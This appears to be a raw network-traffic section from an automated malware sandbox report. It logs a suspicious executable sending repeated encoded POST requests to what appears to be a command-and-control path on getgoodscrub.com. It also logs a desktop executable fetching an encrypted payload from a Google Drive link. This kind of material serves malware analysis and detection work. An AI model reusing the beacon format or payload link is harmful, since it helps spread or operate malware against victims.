                                                                        Data Raw: 66 65 62 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 64 61 74 61 2d 70 61 6e 65 6c 2d 75 72 6c 3d 22 68 74 74 70 73 3a 2f 2f 73 65 72 76 65 72 35 35 2e 68 6f 73 74 69 6e 67 2e 72 65 67 2e 72 75 2f 6d 61 6e 61 67 65 72 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 26 6e 62 73 70 3b d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2f 2a 21 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a [TRUNCATED]
                                                                        Data Ascii: feb2<!doctype html><html lang="ru" class="is_adaptive" data-panel-url="https://server55.hosting.reg.ru/manager"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="robots" content="noindex"><title> &nbsp;</title><style media="all">/*!*************************************************************************************************************************************************************************************************!*\ !*** css ./node_modules/css-loader/index.js??clonedRuleSet-6.use[1]!./node_modules/postcss-loader/src/index.js!./node_modules/less-loader/dist/cjs.js!./bem/blocks.adaptive/b-page/b-page.less ***! \*************************************************************************************************************************************************************************************************/.b-page{display:flex;flex-direction:column;width:100%;min-width:320px;height:100%;padding:57px [TRUNCATED]
                                                                        May 22, 2024 17:36:31.646895885 CEST1289INData Raw: 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76
                                                                        Data Ascii: serif;background:#fff;-webkit-tap-highlight-color:transparent}html:not(.is_adaptive) .b-page{overflow-x:hidden}@media (min-width:1024px){.is_adaptive .b-page{overflow-x:hidden}}.b-page_type_parking{min-height:100vh}.b-page_type_error-page{padd
                                                                        May 22, 2024 17:36:31.647109985 CEST1289INData Raw: 63 6b 7d 2e 62 2d 70 61 67 65 5f 5f 66 6f 6f 74 65 72 2d 64 6f 77 6e 7b 66 6c 65 78 3a 31 20 30 20 61 75 74 6f 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 69 65 20 2e 62 2d 70 61 67 65 5f 5f 66 6f 6f 74 65 72 2d 64 6f 77 6e 7b 6d 69 6e
                                                                        Data Ascii: ck}.b-page__footer-down{flex:1 0 auto;overflow:hidden}.ie .b-page__footer-down{min-height:100%}@media (min-width:1024px){.is_adaptive .b-page__footer-down{overflow:visible}}.b-page__footer-down_overflow_visible{overflow:visible}.b-page__footer
                                                                        May 22, 2024 17:36:31.647229910 CEST1289INData Raw: 78 3b 70 61 64 64 69 6e 67 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 32 66 34 66 39 7d 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76 65 29 20 2e 62 2d 70 61 67 65 5f 5f 61 64 64 69 74 69 6f 6e 2d 77 72 61 70
                                                                        Data Ascii: x;padding:0;background-color:#f2f4f9}html:not(.is_adaptive) .b-page__addition-wrapper{min-width:996px}@media (min-width:1024px){.is_adaptive .b-page__addition-wrapper{min-width:996px}}.b-page__addition-title{float:left;font:700 20px/30px Inter
                                                                        May 22, 2024 17:36:31.647706032 CEST1289INData Raw: 6c 6f 77 5f 76 69 73 69 62 6c 65 2c 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76 65 29 20 2e 62 2d 70 61 67 65 5f 6f 76 65 72 66 6c 6f 77 5f 76 69 73 69 62 6c 65 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 40 6d 65 64 69
                                                                        Data Ascii: low_visible,html:not(.is_adaptive) .b-page_overflow_visible{overflow:visible}@media (min-width:1024px){.is_adaptive .b-page_overflow_visible{overflow:visible}}/*!********************************************************************************
                                                                        May 22, 2024 17:36:31.647722006 CEST1289INData Raw: 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 30 70 78 7d 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 68 75 67 65 2d 63 6f 6d 70 61 63 74 2e 62
                                                                        Data Ascii: Neue,Helvetica,FreeSans,sans-serif;margin-bottom:60px}.b-text_size_huge-compact.b-text_margin_top,.b-text_size_huge.b-text_margin_top{margin-top:60px}.b-text_size_huge-compact{font:48px/54px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-
                                                                        May 22, 2024 17:36:31.647938967 CEST1289INData Raw: 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 34 70 78 7d 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 6e 6f 72 6d 61
                                                                        Data Ascii: Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:24px}.b-text_size_normal-compact.b-text_margin_top,.b-text_size_normal.b-text_margin_top{margin-top:24px}.b-text_size_normal-compact{font:15px/18px Inter,Arial,Helvetica Neue,Helvetica
                                                                        May 22, 2024 17:36:31.648061037 CEST1289INData Raw: 70 2e 62 2d 74 65 78 74 5f 6d 61 72 67 69 6e 5f 74 6f 70 2c 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76 65 29 20 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 68 75 67 65 5c 40 64 65 73 6b 74 6f 70 2e 62 2d 74 65 78 74 5f 6d 61 72 67 69
                                                                        Data Ascii: p.b-text_margin_top,html:not(.is_adaptive) .b-text_size_huge\@desktop.b-text_margin_top{margin-top:60px}html:not(.is_adaptive) .b-text_size_huge-compact\@desktop{font:48px/54px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bo
                                                                        May 22, 2024 17:36:31.648340940 CEST1289INData Raw: 6d 3a 33 30 70 78 7d 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76 65 29 20 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 6d 65 64 69 75 6d 2d 63 6f 6d 70 61 63 74 5c 40 64 65 73 6b 74 6f 70 2e 62 2d 74 65 78 74 5f 6d 61 72 67 69 6e 5f 74
                                                                        Data Ascii: m:30px}html:not(.is_adaptive) .b-text_size_medium-compact\@desktop.b-text_margin_top,html:not(.is_adaptive) .b-text_size_medium\@desktop.b-text_margin_top{margin-top:30px}html:not(.is_adaptive) .b-text_size_medium-compact\@desktop{font:20px/24
                                                                        May 22, 2024 17:36:31.648385048 CEST1289INData Raw: 67 69 6e 3a 30 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 30 32 34 70 78 29 7b 2e 69 73 5f 61 64 61 70 74 69 76 65 20 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 67 69 61 6e 74 5c 40 64 65 73 6b 74 6f 70 7b 66 6f 6e 74 3a 37 32 70 78
                                                                        Data Ascii: gin:0}@media (min-width:1024px){.is_adaptive .b-text_size_giant\@desktop{font:72px/84px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:84px}.is_adaptive .b-text_size_giant-compact\@desktop.b-text_margin_top,.is_adaptive
                                                                        May 22, 2024 17:36:31.996215105 CEST1289INData Raw: 61 72 67 65 5c 40 64 65 73 6b 74 6f 70 7b 66 6f 6e 74 3a 32 34 70 78 2f 33 36 70 78 20 49 6e 74 65 72 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65
                                                                        Data Ascii: arge\@desktop{font:24px/36px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:36px}.is_adaptive .b-text_size_large-compact\@desktop.b-text_margin_top,.is_adaptive .b-text_size_large\@desktop.b-text_margin_top{margin-top:3


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        58192.168.11.304985435.213.232.35807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:36:38.705823898 CEST768OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.getgoodscrub.com
                                                                        Origin: http://www.getgoodscrub.com
                                                                        Referer: http://www.getgoodscrub.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 202
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 58 47 69 30 4f 79 4f 4a 4d 38 57 72 42 6b 74 7a 66 54 38 6b 6b 68 57 58 4e 49 67 41 68 66 6e 76 42 39 64 6c 77 46 74 39 79 58 55 45 2f 55 44 69 6f 57 55 71 35 35 67 68 36 58 51 6c 71 4e 4e 41 6f 43 4c 73 48 68 75 33 64 77 6a 58 68 79 6a 4b 59 32 6b 32 68 63 54 54 77 36 73 47 30 5a 67 62 78 50 56 4b 70 79 39 50 43 67 71 4e 77 77 50 6c 66 56 6b 6a 72 52 51 31 65 4a 4a 4d 4a 65 7a 45 42 73 57 33 44 34 54 39 32 78 34 53 7a 42 56 4e 45 79 4c 6f 61 39 70 71 47 68 32 68 32 69 6c 34 43 4c 61 7a 47 59 57 6a 66 33 31 76 62 48 43 57 78 30 2b 78 44 35 36 37 77 66 33 4c 75 77 2f 47 51 51 3d 3d
                                                                        Data Ascii: nvddg=XGi0OyOJM8WrBktzfT8kkhWXNIgAhfnvB9dlwFt9yXUE/UDioWUq55gh6XQlqNNAoCLsHhu3dwjXhyjKY2k2hcTTw6sG0ZgbxPVKpy9PCgqNwwPlfVkjrRQ1eJJMJezEBsW3D4T92x4SzBVNEyLoa9pqGh2h2il4CLazGYWjf31vbHCWx0+xD567wf3Luw/GQQ==


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        59192.168.11.304985535.213.232.35807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:36:41.668322086 CEST788OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.getgoodscrub.com
                                                                        Origin: http://www.getgoodscrub.com
                                                                        Referer: http://www.getgoodscrub.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 222
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 58 47 69 30 4f 79 4f 4a 4d 38 57 72 42 45 39 7a 65 77 6b 6b 73 68 57 59 54 59 67 41 72 2f 6d 48 42 39 52 6c 77 45 70 4c 7a 68 73 45 34 32 72 69 70 53 41 71 36 35 67 68 30 33 52 76 33 64 4e 39 6f 43 33 4f 48 67 2b 33 64 77 66 58 68 7a 54 4b 59 46 38 31 75 73 54 4e 37 61 73 41 35 35 67 62 78 50 56 4b 70 79 35 68 43 67 79 4e 77 44 58 6c 51 55 6b 73 68 78 52 48 64 4a 4a 4d 44 4f 7a 41 42 73 58 59 44 34 69 71 32 33 38 53 7a 45 70 4e 45 6e 6e 72 50 4e 70 67 49 42 33 6b 78 33 63 72 5a 35 6d 4f 48 34 71 5a 64 32 35 48 54 77 7a 4d 73 33 4b 7a 51 5a 47 57 73 65 61 6a 73 79 2b 64 4e 63 54 53 67 47 62 76 53 33 70 6d 56 63 79 70 53 33 69 65 43 70 59 3d
                                                                        Data Ascii: nvddg=XGi0OyOJM8WrBE9zewkkshWYTYgAr/mHB9RlwEpLzhsE42ripSAq65gh03Rv3dN9oC3OHg+3dwfXhzTKYF81usTN7asA55gbxPVKpy5hCgyNwDXlQUkshxRHdJJMDOzABsXYD4iq238SzEpNEnnrPNpgIB3kx3crZ5mOH4qZd25HTwzMs3KzQZGWseajsy+dNcTSgGbvS3pmVcypS3ieCpY=


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        60192.168.11.304985635.213.232.35807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:36:44.641021013 CEST1705OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.getgoodscrub.com
                                                                        Origin: http://www.getgoodscrub.com
                                                                        Referer: http://www.getgoodscrub.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 1138
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 58 47 69 30 4f 79 4f 4a 4d 38 57 72 42 45 39 7a 65 77 6b 6b 73 68 57 59 54 59 67 41 72 2f 6d 48 42 39 52 6c 77 45 70 4c 7a 69 4d 45 34 48 4c 69 6f 31 38 71 37 35 67 68 38 58 52 69 33 64 4e 61 6f 43 76 4b 48 6c 6d 4e 64 31 54 58 67 51 62 4b 61 30 38 31 31 63 54 4e 30 36 73 46 30 5a 68 5a 78 50 46 56 70 79 70 68 43 67 79 4e 77 42 6a 6c 58 46 6b 73 6e 78 51 31 65 4a 49 65 4a 65 79 6e 42 74 79 76 44 35 58 58 33 48 63 53 77 6b 5a 4e 47 56 66 72 4e 74 70 75 4c 42 33 43 78 33 5a 7a 5a 35 36 34 48 35 75 2f 64 30 70 48 57 48 61 30 78 46 65 56 4b 61 4c 55 67 66 4b 45 36 52 36 61 44 62 44 6f 74 6c 58 50 62 44 35 6e 62 63 32 4e 4f 33 61 46 42 64 30 4c 4f 68 48 6f 31 47 63 45 67 71 39 6a 59 43 53 67 42 50 75 33 69 57 41 55 32 73 77 57 54 45 57 43 5a 62 45 74 61 58 44 46 59 67 4b 73 67 6b 4d 49 4d 61 77 4f 51 75 39 49 72 52 4e 56 70 70 30 34 36 36 45 48 6f 2f 55 48 6b 59 4f 73 75 74 49 39 4f 6a 2f 2f 57 30 6f 45 46 61 35 35 78 68 47 59 50 53 4e 4e 7a 4b 58 70 46 66 36 66 63 32 45 34 39 71 77 52 [TRUNCATED]
                                                                        Data Ascii: nvddg=XGi0OyOJM8WrBE9zewkkshWYTYgAr/mHB9RlwEpLziME4HLio18q75gh8XRi3dNaoCvKHlmNd1TXgQbKa0811cTN06sF0ZhZxPFVpyphCgyNwBjlXFksnxQ1eJIeJeynBtyvD5XX3HcSwkZNGVfrNtpuLB3Cx3ZzZ564H5u/d0pHWHa0xFeVKaLUgfKE6R6aDbDotlXPbD5nbc2NO3aFBd0LOhHo1GcEgq9jYCSgBPu3iWAU2swWTEWCZbEtaXDFYgKsgkMIMawOQu9IrRNVpp0466EHo/UHkYOsutI9Oj//W0oEFa55xhGYPSNNzKXpFf6fc2E49qwRLr499IYZZfbiMFgsIpQ7q78J0bW/e1zKHULqn+4RC4A4ReQ3FyWg50em/ulS2c+/MC/2KxZIXbA2AI+04QFFVp4cV/AcX9cjrwZrc0z5Dr5TAHW62u2BtVyvX8YRU4pNVhbGEqc7+5iMmTl6QNIjDLVXsuiW9hEo/JwM2s/ZJn7hHFDXaiAxDOCyT0dVtjxHnvdvbA0EuYNAYCo0ChuTT6nJlbkWZkXfeMFpqJ9BvmuYE+4KvC5FoaNQNn8FBB4EAF5W1PGJbSj4BUl23thHWXfY3j4rw/z1LFEUtpRW+p3z0kwxfM8TVt0XV5Y37cGmaU38s2oUBhVgGNNqTsAB6zKgvarC+9KDndF1PDjeZIUVSn5yR30erETKPRe7RLfOAe8SAY/56ndqV0HRhgL/DWvSFSTIS6aYd+ZTe0QNivFadvf1xi5Dt7hNslA6jpkyLrIG6DJLiYRV4ueHm/F/bTRacaKq6FrfLC0BHxPWrmzeaDLuIVsZLqrj/CMIW03l7C341UCXccF/WQGjtnQS4qf3dnU5ca9uVYtbq6xiF6//iYf7ACYd53Tg/2PRiDE/McbOoDIwrJYzXdleJb+dp40uz4/9lpfNX6StTQ6Amh4Fc/iACpxJMlUvEPZyne00fE/U4Sf5ZTdcIwSfDqHJummDSwUwXdYUge [TRUNCATED]


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        61192.168.11.304985735.213.232.35807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:36:47.604533911 CEST501OUTGET /op6t/?nvddg=aEKUNFeJbfSYXwp4ZCE5pj6NM5Y9npuXTcZZ2VZLyy8DmHHct0wY69Uf2FlN/+Mr5yqkWwSEcnLthRGoVw08meHK6rNA3rJY5N4rrVRcMXWX5QnofEk8vUc=&iXoT=lfKx4XoXw4a8lZu HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Host: www.getgoodscrub.com
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36


                                                                        HTTPS Proxied Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.11.3049793142.250.69.2064434956C:\Users\user\Desktop\FRA.0038253.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-05-22 15:30:28 UTC216OUTGET /uc?export=download&id=1sSTbdeAy6HZYgZE2D-KGpyeTtdrEakj3 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        2024-05-22 15:30:28 UTC1582INHTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Wed, 22 May 2024 15:30:28 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1sSTbdeAy6HZYgZE2D-KGpyeTtdrEakj3&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Content-Security-Policy: script-src 'nonce-6GYCVtjI_HcJtTRB3Df4WQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.11.3049794142.251.33.974434956C:\Users\user\Desktop\FRA.0038253.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-05-22 15:30:29 UTC258OUTGET /download?id=1sSTbdeAy6HZYgZE2D-KGpyeTtdrEakj3&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        2024-05-22 15:30:30 UTC4818INHTTP/1.1 200 OK
                                                                        Content-Type: application/octet-stream
                                                                        Content-Security-Policy: sandbox
                                                                        Content-Security-Policy: default-src 'none'
                                                                        Content-Security-Policy: frame-ancestors 'none'
                                                                        X-Content-Security-Policy: sandbox
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Cross-Origin-Embedder-Policy: require-corp
                                                                        Cross-Origin-Resource-Policy: same-site
                                                                        X-Content-Type-Options: nosniff
                                                                        Content-Disposition: attachment; filename="NFjfCaZXAaJahT109.bin"
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Credentials: false
                                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Dom [TRUNCATED]
                                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                        Accept-Ranges: bytes
                                                                        Content-Length: 270400
                                                                        Last-Modified: Wed, 22 May 2024 09:33:10 GMT
                                                                        X-GUploader-UploadID: ABPtcPoG_qlquJSXTVZKLUecERwWl_feafxazszYHEpcmAG3MxNRL0L_WIczDsSepKnhTaKTeIWUWt1hgg
                                                                        Date: Wed, 22 May 2024 15:30:30 GMT
                                                                        Expires: Wed, 22 May 2024 15:30:30 GMT
                                                                        Cache-Control: private, max-age=0
                                                                        X-Goog-Hash: crc32c=m3F2TQ==
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close
                                                                        2024-05-22 15:30:30 UTC4818INData Raw: bc 92 ce da 2f fc af 14 9a f3 a1 49 f8 16 ce 04 64 11 fa 58 a9 fb 70 fb 51 54 ad d3 48 b1 8f 81 e0 ca 18 62 53 27 3c 45 c8 2f 89 8c b9 71 ca ce 5a 3e c7 95 11 17 89 b2 99 a7 bc ec b0 03 e4 e7 72 d1 bd 28 d7 4a b6 f0 e8 f7 5c f1 ac 1b ec bc 65 4d 14 27 7f f3 31 05 ee 6b 6c 8b 78 95 b7 24 3a 3c ea 9c 2f 1c a0 38 e7 41 15 0c 56 40 40 cd 58 cc 0d da 33 c5 da e5 d5 e8 8e 69 91 b2 da 11 f7 57 bb b6 c0 19 5a fb b8 54 ba 4e 21 7c 87 b4 80 66 b5 38 4c 2f 7f 95 b6 5c 3d 4c 42 72 49 c2 05 1b 9d 9e be 2e 7b 2b e6 f2 e9 71 6d 0f 15 04 b0 f6 5d 70 b1 f3 68 f4 15 24 b5 66 a9 82 ea 5a 73 cb 87 d0 0c 2e 04 3c cf 15 db 9d 01 fa a2 77 ec 3d 76 fb ed b3 46 93 e3 85 1b 46 de 51 17 14 01 9c 59 43 a9 e6 c1 cb 7b 7f 54 ab ea 68 3c 14 e3 13 ee c9 5b c7 0e 87 b7 95 37 1d ab 59 99
                                                                        Data Ascii: /IdXpQTHbS'<E/qZ>r(J\eM'1klx$:</8AV@@X3iWZTN!|f8L/\=LBrI.{+qm]ph$fZs.<w=vFFQYC{Th<[7Y
                                                                        2024-05-22 15:30:30 UTC4818INData Raw: 13 03 ed b4 1c 03 4d a2 f3 33 a6 e6 32 b4 ab 16 d8 57 14 ec dd 7a dd 5b e7 76 19 92 fe b5 da 1e 18 52 6b fe 67 1e 92 9b 1f 57 b9 76 1a e0 22 52 2e 6c b2 77 99 d2 35 7b d1 8f 1f 12 7c 63 bf 53 03 02 46 27 06 c3 d9 90 d9 23 03 a8 b6 81 cf 80 6d 16 63 65 7e 64 55 7c f6 91 5b 64 2c 2c 0c 2b d6 40 33 6d 4c 2f 8c 3a b2 2b 1c 9a c2 fe 49 41 e0 43 97 21 d0 eb 14 77 dc 06 9f 87 45 73 1e 24 c4 bb 78 70 49 26 ea 8a 1f d1 fb 1c d6 af bc 14 13 71 1b 50 1d f0 66 bf d3 3e 54 c8 75 a5 0d 31 ed 37 dc 5d b9 eb 18 98 1a 0e f2 e9 b5 04 20 32 a9 43 a6 c1 72 05 7e 12 f7 51 dc ea 0d 65 2a 64 2e 72 aa 95 df ff a2 23 c3 50 d9 79 73 60 e2 07 a5 5b 2c e5 c8 8c 9d 85 fe f1 dd 5d 88 8d a7 bb fd ae 9a ea 5b 4d f8 5b e1 2c 4c 19 a9 6a 59 37 70 a4 a6 88 2e f4 af 85 79 b3 c2 04 a9 51 3d
                                                                        Data Ascii: M32Wz[vRkgWv"R.lw5{|cSF'#mce~dU|[d,,+@3mL/:+IAC!wEs$xpI&qPf>Tu17] 2Cr~Qe*d.r#Pys`[,][M[,LjY7p.yQ=
